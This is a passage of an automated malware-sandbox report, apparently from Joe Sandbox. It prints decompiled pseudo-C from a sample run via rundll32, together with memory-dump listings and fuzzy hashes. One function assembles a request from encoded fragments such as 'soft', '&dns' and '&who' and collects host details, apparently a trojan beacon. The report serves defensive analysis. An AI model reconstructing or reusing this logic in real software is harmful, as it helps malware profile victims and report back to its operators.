                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t7 = E031B7323(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    				_t12 = _t7;
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_push(_t12);
                                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                                                    					L031B5544();
                                                                                                                                                                                                                                    					 *((char*)(_t12 + __edi)) = 0;
                                                                                                                                                                                                                                    					E031B9039(_t7, _a4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: 75ca85c2cb0c885eee4b40b84f0720cd6bc0bcd8da7596157b17d8a3a18be7dd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FE08676504328B7C7126A94DC00EEFBF7DCF49691F044011FE088D100D721D51093E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031BAC9C() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E031BADE5(0x31bc344, 0x31bd158); // executed
                                                                                                                                                                                                                                    				goto __eax;
                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                    0x031bac93
                                                                                                                                                                                                                                    0x031bac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1acca0b97e9046baed0fe9e2e87218d5448909614e7eafe84278f14da7624a02
                                                                                                                                                                                                                                    • Instruction ID: 17ebbda5dc8cf7653d01666dc2a37692e4aa471a8a1920894713f2b4f63e611c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1acca0b97e9046baed0fe9e2e87218d5448909614e7eafe84278f14da7624a02
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBB01289258201AFF08CD10C2D02CFE023CC8CCA63360811AF000C8104D7400C850031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E031BAC81() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E031BADE5(0x31bc344, 0x31bd15c); // executed
                                                                                                                                                                                                                                    				goto __eax;
                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                    0x031bac93
                                                                                                                                                                                                                                    0x031bac9a

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b275c465217d656cf376eeaebb1e6fbe73abd5d99b3ead65ae66e0f50c2b96f9
                                                                                                                                                                                                                                    • Instruction ID: 4160e3618dba6629e2158df706db9d2379a8a83180b02fbddc29bba252c89175
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b275c465217d656cf376eeaebb1e6fbe73abd5d99b3ead65ae66e0f50c2b96f9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25B0128D258101BFF00CD5082E12CFE033CC8CCA63360C52AF400D8004D7400C450031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.526880922.00000000031B1000.00000020.00020000.sdmp, Offset: 031B0000, based on PE: true
• Associated: 00000003.00000002.526816146.00000000031B0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527055981.00000000031BC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.527086530.00000000031BD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.527107409.00000000031BF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_31b0000_rundll32.jbxd
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
• Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
• Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
Similarity
• String ID: $
• API String ID: 0-3993045852
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                                                                                                    			E04C38B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                    				intOrPtr _t92;
                                                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                                    				intOrPtr* _t108;
                                                                                                                                                                                                                                    				intOrPtr* _t110;
                                                                                                                                                                                                                                    				intOrPtr* _t112;
                                                                                                                                                                                                                                    				intOrPtr* _t114;
                                                                                                                                                                                                                                    				intOrPtr _t116;
                                                                                                                                                                                                                                    				intOrPtr _t121;
                                                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                    				intOrPtr* _t128;
                                                                                                                                                                                                                                    				void* _t129;
                                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                    				void* _t140;
                                                                                                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                                                    				intOrPtr* _t148;
                                                                                                                                                                                                                                    				intOrPtr* _t149;
                                                                                                                                                                                                                                    				intOrPtr* _t152;
                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t138 = __edx;
                                                                                                                                                                                                                                    				_t129 = __ecx;
                                                                                                                                                                                                                                    				_t59 = __eax;
                                                                                                                                                                                                                                    				_v12 = 8;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t60 =  *0x4c3d018; // 0x99d5691b
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t61 =  *0x4c3d014; // 0x3a87c8cd
                                                                                                                                                                                                                                    				_t127 = _a16;
                                                                                                                                                                                                                                    				_t146 =  *0x4c3d120; // 0x73fcc740
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t62 =  *0x4c3d010; // 0xd8d2f808
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t63 =  *0x4c3d00c; // 0x62819102
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t64 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t3 = _t64 + 0x4c3e633; // 0x74666f73
                                                                                                                                                                                                                                    				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4c3d02c,  *0x4c3d004, _t59);
                                                                                                                                                                                                                                    				_t68 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t4 = _t68 + 0x4c3e673; // 0x74707526
                                                                                                                                                                                                                                    				_t71 =  *_t146(_t139 + _t127, _t4, E04C31C1A());
                                                                                                                                                                                                                                    				_t155 = _t153 + 0x38;
                                                                                                                                                                                                                                    				_t140 = _t139 + _t71; // executed
                                                                                                                                                                                                                                    				_t72 = E04C354BC(_t129); // executed
                                                                                                                                                                                                                                    				_t128 = __imp__; // 0x76d25520
                                                                                                                                                                                                                                    				_v8 = _t72;
                                                                                                                                                                                                                                    				if(_t72 != 0) {
                                                                                                                                                                                                                                    					_t121 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    					_t7 = _t121 + 0x4c3e8eb; // 0x736e6426
                                                                                                                                                                                                                                    					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
                                                                                                                                                                                                                                    					_t155 = _t155 + 0xc;
                                                                                                                                                                                                                                    					_t140 = _t140 + _t125;
                                                                                                                                                                                                                                    					 *_t128( *0x4c3d238, 0, _v8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t73 = E04C37649();
                                                                                                                                                                                                                                    				_v8 = _t73;
                                                                                                                                                                                                                                    				if(_t73 != 0) {
                                                                                                                                                                                                                                    					_t116 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    					_t11 = _t116 + 0x4c3e8f3; // 0x6f687726
                                                                                                                                                                                                                                    					 *_t146(_t140 + _a16, _t11, _t73);
                                                                                                                                                                                                                                    					_t155 = _t155 + 0xc;
                                                                                                                                                                                                                                    					 *_t128( *0x4c3d238, 0, _v8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t141 =  *0x4c3d32c; // 0x56a95b0
                                                                                                                                                                                                                                    				_t75 = E04C39395(0x4c3d00a, _t141 + 4);
                                                                                                                                                                                                                                    				_t147 = 0;
                                                                                                                                                                                                                                    				_v20 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					L26:
                                                                                                                                                                                                                                    					 *_t128( *0x4c3d238, _t147, _a16); // executed
                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					__imp__( *0x4c3d238, 0, 0x800);
                                                                                                                                                                                                                                    					_v8 = _t75;
                                                                                                                                                                                                                                    					if(_t75 == 0) {
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, _t147, _v20);
                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					E04C37A80(_t75);
                                                                                                                                                                                                                                    					_t80 =  *0x4c3d32c; // 0x56a95b0
                                                                                                                                                                                                                                    					__imp__(_t80 + 0x40);
                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    					_t84 =  *0x4c3d32c; // 0x56a95b0
                                                                                                                                                                                                                                    					__imp__(_t84 + 0x40);
                                                                                                                                                                                                                                    					_t86 =  *0x4c3d32c; // 0x56a95b0
                                                                                                                                                                                                                                    					_t143 = E04C38307(1, _t138, _a16,  *_t86);
                                                                                                                                                                                                                                    					_v28 = _t143;
                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    					if(_t143 == 0) {
                                                                                                                                                                                                                                    						L24:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, _t147, _v8);
                                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x4c3d104(_t143, 0x4c3c2ac);
                                                                                                                                                                                                                                    					_push(_t143);
                                                                                                                                                                                                                                    					_t92 = E04C33CC8();
                                                                                                                                                                                                                                    					_v16 = _t92;
                                                                                                                                                                                                                                    					if(_t92 == 0) {
                                                                                                                                                                                                                                    						L23:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, _t147, _t143);
                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t148 = __imp__; // 0x76d68170
                                                                                                                                                                                                                                    					 *_t148(_t143, _a4);
                                                                                                                                                                                                                                    					 *_t148(_v8, _v20);
                                                                                                                                                                                                                                    					_t149 = __imp__; // 0x76d681d0
                                                                                                                                                                                                                                    					 *_t149(_v8, _v16);
                                                                                                                                                                                                                                    					 *_t149(_v8, _t143);
                                                                                                                                                                                                                                    					_t99 = E04C3809F(0, _v8);
                                                                                                                                                                                                                                    					_a4 = _t99;
                                                                                                                                                                                                                                    					if(_t99 == 0) {
                                                                                                                                                                                                                                    						_v12 = 8;
                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                    						E04C3A1B0();
                                                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, 0, _v16);
                                                                                                                                                                                                                                    						_t147 = 0;
                                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t103 = E04C343DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
                                                                                                                                                                                                                                    					_v12 = _t103;
                                                                                                                                                                                                                                    					if(_t103 == 0) {
                                                                                                                                                                                                                                    						_t152 = _v24;
                                                                                                                                                                                                                                    						_t107 = E04C3163F(_t152, _a4, _a8, _a12); // executed
                                                                                                                                                                                                                                    						_v12 = _t107;
                                                                                                                                                                                                                                    						_t108 =  *((intOrPtr*)(_t152 + 8));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
                                                                                                                                                                                                                                    						_t110 =  *((intOrPtr*)(_t152 + 8));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t110 + 8))(_t110);
                                                                                                                                                                                                                                    						_t112 =  *((intOrPtr*)(_t152 + 4));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t112 + 8))(_t112);
                                                                                                                                                                                                                                    						_t114 =  *_t152;
                                                                                                                                                                                                                                    						_t103 = E04C39039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						if(_v12 == 0) {
                                                                                                                                                                                                                                    							_t103 = _a8;
                                                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                                                    								_t144 =  *_t103;
                                                                                                                                                                                                                                    								_t150 =  *_a12;
                                                                                                                                                                                                                                    								_push( *_a12);
                                                                                                                                                                                                                                    								_push(_t144);
                                                                                                                                                                                                                                    								_push(_t144);
                                                                                                                                                                                                                                    								L04C38F0A();
                                                                                                                                                                                                                                    								_t103 = E04C385DB(_t144, _t144, _t150 >> 1);
                                                                                                                                                                                                                                    								_t143 = _v28;
                                                                                                                                                                                                                                    								 *_a12 = _t103;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                    							E04C39039(_t103, _a4);
                                                                                                                                                                                                                                    							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}




















































                                                                                                                                                                                                                                    0x04c38ddf
                                                                                                                                                                                                                                    0x04c38e16
                                                                                                                                                                                                                                    0x04c38e19
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x04c38dd9

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction ID: ba185fc3ce7b046f8885aab4a7c747515c20991a6456bb4a3e0796eab837ba10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B913979900208AFDB11EFA8DC84BAE7BBAEF48356F144054F806E7260D739ED51DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction ID: 8bc5be279adfe0f928f2cb0fe5d72ab4901e5e428f30d82630db07478df0ce62
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB814AB6D00119AFDF11DFA5DC84AEEBBBAFB48302F144166E506E6250DB35AE44CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E04C3225B(signed int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                    				signed int _t41;
                                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    				signed char _t53;
                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t58 = __edx;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t21 = E04C3550E();
                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                    					_t56 =  *0x4c3d25c; // 0x4000000a
                                                                                                                                                                                                                                    					_t52 = (_t56 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    					 *0x4c3d25c = (_t56 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t22 =  *0x4c3d164(0, 2); // executed
                                                                                                                                                                                                                                    				_v16 = _t22;
                                                                                                                                                                                                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                    					_t25 = E04C33D0D( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                    					_t51 = _t25;
                                                                                                                                                                                                                                    					_t26 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    					if( *0x4c3d25c > 5) {
                                                                                                                                                                                                                                    						_t8 = _t26 + 0x4c3e5cd; // 0x4d283a53
                                                                                                                                                                                                                                    						_t27 = _t8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t7 = _t26 + 0x4c3ea15; // 0x44283a44
                                                                                                                                                                                                                                    						_t27 = _t7;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E04C31BF4(_t27, _t27);
                                                                                                                                                                                                                                    					_t31 = E04C31B2F(_t58,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						__imp__(_v20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t59 = 5;
                                                                                                                                                                                                                                    					if(_t51 != _t59) {
                                                                                                                                                                                                                                    						 *0x4c3d270 =  *0x4c3d270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                    						_t32 = E04C32049(_t31, 0x60);
                                                                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                                                                    						 *0x4c3d32c = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							L04C3A7BC();
                                                                                                                                                                                                                                    							_t47 =  *0x4c3d32c; // 0x56a95b0
                                                                                                                                                                                                                                    							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                    							__imp__(_t47 + 0x40, _t32, 0, 0x60);
                                                                                                                                                                                                                                    							_t49 =  *0x4c3d32c; // 0x56a95b0
                                                                                                                                                                                                                                    							 *_t49 = 0x4c3e836;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_t51 = 0;
                                                                                                                                                                                                                                    						if(0 == 0) {
                                                                                                                                                                                                                                    							__imp__( *0x4c3d238, 0, 0x43);
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							 *0x4c3d2c4 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								_push(8);
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t53 =  *0x4c3d25c; // 0x4000000a
                                                                                                                                                                                                                                    								_t58 = _t53 & 0x000000ff;
                                                                                                                                                                                                                                    								_t55 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    								_t13 = _t55 + 0x4c3e55a; // 0x697a6f4d
                                                                                                                                                                                                                                    								_t52 = _t13;
                                                                                                                                                                                                                                    								 *0x4c3d120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x4c3c2a7);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							_t51 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								E04C3269C( ~_v8 &  *0x4c3d270, 0x4c3d00c); // executed
                                                                                                                                                                                                                                    								_t41 = E04C34094(_t52); // executed
                                                                                                                                                                                                                                    								_t51 = _t41;
                                                                                                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                                                                                                    								if(_t51 != 0) {
                                                                                                                                                                                                                                    									goto L30;
